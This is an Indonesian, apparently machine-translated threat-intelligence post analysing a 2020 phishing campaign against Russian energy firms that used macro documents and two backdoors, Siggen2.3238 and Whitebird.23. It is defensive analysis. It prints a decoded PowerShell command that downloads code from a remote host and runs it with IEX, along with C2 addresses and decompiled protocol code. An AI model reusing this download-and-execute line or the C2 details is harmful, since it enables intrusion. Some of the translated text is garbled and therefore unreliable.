Pengalaman kami dalam menyelidiki insiden keamanan komputer menunjukkan bahwa email masih menjadi salah satu saluran yang paling umum digunakan oleh penyerang untuk menembus infrastruktur jaringan yang diserang. Satu tindakan ceroboh dengan surat yang mencurigakan (atau tidak terlalu mencurigakan) menjadi pintu masuk infeksi lebih lanjut, itulah sebabnya penjahat dunia maya secara aktif menggunakan metode rekayasa sosial, meskipun dengan tingkat keberhasilan yang berbeda-beda.
Dalam postingan ini kami ingin berbicara tentang penyelidikan terbaru kami terhadap kampanye spam yang menargetkan sejumlah perusahaan di kompleks bahan bakar dan energi Rusia. Semua serangan mengikuti skenario yang sama dengan menggunakan email palsu, dan sepertinya tidak ada seorang pun yang berupaya keras untuk memasukkan konten teks email tersebut.
Badan intelijen
Semuanya dimulai pada akhir April 2020, ketika analis virus Doctor Web mendeteksi kampanye spam di mana peretas mengirimkan direktori telepon yang diperbarui ke karyawan sejumlah perusahaan di kompleks bahan bakar dan energi Rusia. Tentu saja, ini bukan sekadar kekhawatiran, karena direktori tersebut tidak asli, dan dokumen .docx mengunduh dua gambar dari sumber jarak jauh.
Salah satunya diunduh ke komputer pengguna dari server berita[.]zannews[.]com. Patut dicatat bahwa nama domain tersebut mirip dengan domain pusat media antikorupsi Kazakhstan - zannews[.]kz. Di sisi lain, domain yang digunakan mengingatkan kita pada kampanye tahun 2015 lainnya yang dikenal sebagai TOPNEWS, yang menggunakan pintu belakang ICEFOG dan memiliki domain kontrol Trojan dengan substring βberitaβ di namanya. Fitur menarik lainnya adalah ketika mengirim email ke penerima yang berbeda, permintaan untuk mendownload gambar menggunakan parameter permintaan yang berbeda atau nama gambar yang unik.
Kami percaya bahwa hal ini dilakukan dengan tujuan mengumpulkan informasi untuk mengidentifikasi penerima yang βdapat diandalkanβ, yang kemudian dijamin akan membuka surat pada waktu yang tepat. Protokol SMB digunakan untuk mengunduh gambar dari server kedua, yang dapat dilakukan untuk mengumpulkan hash NetNTLM dari komputer karyawan yang membuka dokumen yang diterima.
Dan inilah surat itu sendiri dengan direktori palsu:
Pada bulan Juni tahun ini, peretas mulai menggunakan nama domain baru, sports[.]manhajnews[.]com, untuk mengunggah gambar. Analisis menunjukkan bahwa subdomain manhajnews[.]com telah digunakan dalam surat spam setidaknya sejak September 2019. Salah satu target kampanye ini adalah universitas besar Rusia.
Selain itu, pada bulan Juni, penyelenggara penyerangan membuat teks baru untuk surat mereka: kali ini dokumen tersebut berisi informasi tentang perkembangan industri. Teks surat itu dengan jelas menunjukkan bahwa penulisnya bukan penutur asli bahasa Rusia, atau sengaja menciptakan kesan seperti itu pada dirinya sendiri. Sayangnya, ide pengembangan industri, seperti biasa, ternyata hanya kedok - dokumen kembali mendownload dua gambar, sedangkan server diubah menjadi download[.]inklingpaper[.]com.
Inovasi berikutnya menyusul pada bulan Juli. Dalam upaya untuk menghindari deteksi dokumen berbahaya oleh program antivirus, penyerang mulai menggunakan dokumen Microsoft Word yang dienkripsi dengan kata sandi. Pada saat yang sama, para penyerang memutuskan untuk menggunakan teknik rekayasa sosial klasik - pemberitahuan hadiah.
Teks banding kembali ditulis dengan gaya yang sama, yang menimbulkan kecurigaan tambahan di kalangan penerima. Server untuk mendownload gambar juga tidak berubah.
Perhatikan bahwa dalam semua kasus, kotak surat elektronik yang terdaftar di domain mail[.]ru dan yandex[.]ru digunakan untuk mengirim surat.
Menyerang
Pada awal September 2020, tiba waktunya untuk bertindak. Analis virus kami mencatat gelombang serangan baru, di mana penyerang kembali mengirimkan surat dengan dalih memperbarui direktori telepon. Namun, kali ini lampiran tersebut berisi makro berbahaya.
Saat membuka dokumen terlampir, makro membuat dua file:
- Skrip VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, yang dimaksudkan untuk meluncurkan file batch;
- File batch itu sendiri %APPDATA%configstest.bat, yang dikaburkan.
Inti dari pekerjaannya adalah meluncurkan shell Powershell dengan parameter tertentu. Parameter yang diteruskan ke shell didekodekan menjadi perintah:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Sebagai berikut dari perintah yang diberikan, domain tempat payload diunduh kembali disamarkan sebagai situs berita. Sederhana , yang tugas utamanya adalah menerima kode shell dari server perintah dan kontrol dan menjalankannya. Kami dapat mengidentifikasi dua jenis backdoor yang dapat diinstal pada PC korban.
Pintu Belakang.Siggen2.3238
Yang pertama adalah Pintu Belakang.Siggen2.3238 β spesialis kami belum pernah menemukannya sebelumnya, dan program ini juga tidak disebutkan oleh vendor antivirus lain.
Program ini adalah pintu belakang yang ditulis dalam C++ dan berjalan pada sistem operasi Windows 32-bit.
Pintu Belakang.Siggen2.3238 dapat berkomunikasi dengan server manajemen menggunakan dua protokol: HTTP dan HTTPS. Sampel yang diuji menggunakan protokol HTTPS. Agen-Pengguna berikut digunakan dalam permintaan ke server:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Dalam hal ini, semua permintaan diberikan dengan serangkaian parameter berikut:
%s;type=%s;length=%s;realdata=%send
di mana setiap baris %s digantikan oleh:
- ID komputer yang terinfeksi,
- jenis permintaan yang dikirim,
- panjang data di bidang realdata,
- data.
Pada tahap pengumpulan informasi tentang sistem yang terinfeksi, pintu belakang menghasilkan baris seperti:
lan=%s;cmpname=%s;username=%s;version=%s;
dimana lan adalah alamat IP komputer yang terinfeksi, cmpname adalah nama komputer, username adalah nama pengguna, versi adalah baris 0.0.4.03.
Informasi dengan pengidentifikasi sysinfo ini dikirim melalui permintaan POST ke server kontrol yang terletak di https[:]//31.214[.]157.14/log.txt. Jika sebagai tanggapan Pintu Belakang.Siggen2.3238 menerima sinyal HATI, koneksi dianggap berhasil, dan pintu belakang memulai siklus utama komunikasi dengan server.
Penjelasan lebih lengkap tentang prinsip pengoperasian Pintu Belakang.Siggen2.3238 ada di kita .
Pintu Belakang.Whitebird.23
Program kedua merupakan modifikasi dari backdoor BackDoor.Whitebird yang sudah kita ketahui dari kejadian dengan instansi pemerintah di Kazakhstan. Versi ini ditulis dalam C++ dan dirancang untuk berjalan pada sistem operasi Windows 32-bit dan 64-bit.
Seperti kebanyakan program jenis ini, Pintu Belakang.Whitebird.23 dirancang untuk membuat koneksi terenkripsi dengan server kontrol dan kontrol tidak sah atas komputer yang terinfeksi. Diinstal ke dalam sistem yang disusupi menggunakan dropper .
Sampel yang kami periksa adalah perpustakaan berbahaya dengan dua ekspor:
- Google Play
- Uji.
Pada awal kerjanya, ia mendekripsi konfigurasi yang tertanam di badan pintu belakang menggunakan algoritma berdasarkan operasi XOR dengan byte 0x99. Konfigurasinya terlihat seperti:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Untuk memastikan operasinya konstan, pintu belakang mengubah nilai yang ditentukan di kolom jam kerja konfigurasi. Bidang tersebut berisi 1440 byte, yang mengambil nilai 0 atau 1 dan mewakili setiap menit setiap jam dalam sehari. Membuat thread terpisah untuk setiap antarmuka jaringan yang mendengarkan antarmuka dan mencari paket otorisasi pada server proxy dari komputer yang terinfeksi. Ketika paket tersebut terdeteksi, pintu belakang menambahkan informasi tentang server proxy ke daftarnya. Selain itu, memeriksa keberadaan proxy melalui WinAPI InternetQueryOptionW.
Program ini memeriksa menit dan jam saat ini dan membandingkannya dengan data di lapangan jam kerja konfigurasi. Jika nilai menit yang bersangkutan pada hari itu bukan nol, maka koneksi dibuat dengan server kontrol.
Membuat koneksi ke server mensimulasikan pembuatan koneksi menggunakan protokol TLS versi 1.0 antara klien dan server. Badan pintu belakang berisi dua buffer.
Buffer pertama berisi paket TLS 1.0 Client Hello.
Buffer kedua berisi paket TLS 1.0 Client Key Exchange dengan panjang kunci 0x100 byte, Change Cipher Spec, Encrypted Handshake Message.
Saat mengirim paket Client Hello, pintu belakang menulis 4 byte waktu saat ini dan 28 byte data pseudo-acak di bidang Acak Klien, dihitung sebagai berikut:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Paket yang diterima dikirim ke server kontrol. Responsnya (paket Server Hello) memeriksa:
- kepatuhan terhadap protokol TLS versi 1.0;
- korespondensi stempel waktu (4 byte pertama bidang paket Data Acak) yang ditentukan oleh klien dengan stempel waktu yang ditentukan oleh server;
- kecocokan 4 byte pertama setelah stempel waktu di bidang Data Acak klien dan server.
Jika ada kecocokan yang ditentukan, pintu belakang menyiapkan paket Pertukaran Kunci Klien. Untuk melakukan hal ini, ia memodifikasi Kunci Publik dalam paket Pertukaran Kunci Klien, serta Enkripsi IV dan Data Enkripsi dalam paket Pesan Jabat Tangan Terenkripsi.
Pintu belakang kemudian menerima paket dari server perintah dan kontrol, memeriksa apakah versi protokol TLS adalah 1.0, dan kemudian menerima 54 byte lainnya (badan paket). Ini menyelesaikan pengaturan koneksi.
Penjelasan lebih lengkap tentang prinsip pengoperasian Pintu Belakang.Whitebird.23 ada di kita .
Kesimpulan dan kesimpulan
Analisis dokumen, malware, dan infrastruktur yang digunakan memungkinkan kami untuk mengatakan dengan yakin bahwa serangan tersebut disiapkan oleh salah satu kelompok APT Tiongkok. Mengingat fungsi pintu belakang yang diinstal pada komputer korban jika serangan berhasil, infeksi setidaknya menyebabkan pencurian informasi rahasia dari komputer organisasi yang diserang.
Selain itu, skenario yang sangat mungkin terjadi adalah pemasangan Trojan khusus di server lokal dengan fungsi khusus. Ini bisa berupa pengontrol domain, server email, gateway Internet, dll. Seperti yang bisa kita lihat di contoh , server tersebut menjadi perhatian khusus bagi penyerang karena berbagai alasan.
Sumber: www.habr.com